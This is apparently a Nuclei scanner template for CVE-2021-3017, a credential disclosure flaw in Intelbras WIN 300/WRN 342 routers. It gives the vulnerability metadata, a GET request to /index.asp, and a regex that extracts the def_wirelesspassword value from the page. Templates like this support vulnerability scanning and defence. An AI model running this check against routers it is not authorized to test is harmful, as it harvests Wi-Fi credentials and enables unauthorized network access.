id: CVE-2021-3017 info: name: Intelbras WIN 300/WRN 342 - Credentials Disclosure author: pikpikcu severity: high description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. impact: | An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - https://pastebin.com/cTYTf0Yn - https://github.com/bigblackhat/oFx - https://github.com/openx-org/BLEN - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3017 epss-score: 0.01563 epss-percentile: 0.87211 cpe: cpe:2.3:h:intelbras:win_300:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: win_300 tags: cve2021,cve,exposure,router,intelbras http: - method: GET path: - "{{BaseURL}}/index.asp" matchers-condition: and matchers: - type: word part: body words: - 'def_wirelesspassword =' - 'Roteador Wireless' condition: and - type: status status: - 200 extractors: - type: regex regex: - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' part: body # digest: 4a0a0047304502201c934367796b4de85165e7f7999796b343c33ca8aa7a4c87ffa1b0ffa58f05ee0221008c14fe4478d7d5fa39868bdb04a79b70a404e47da93e4f5886e7a6fbf3446bdd:922c64590222798bb761d5b6d8e72950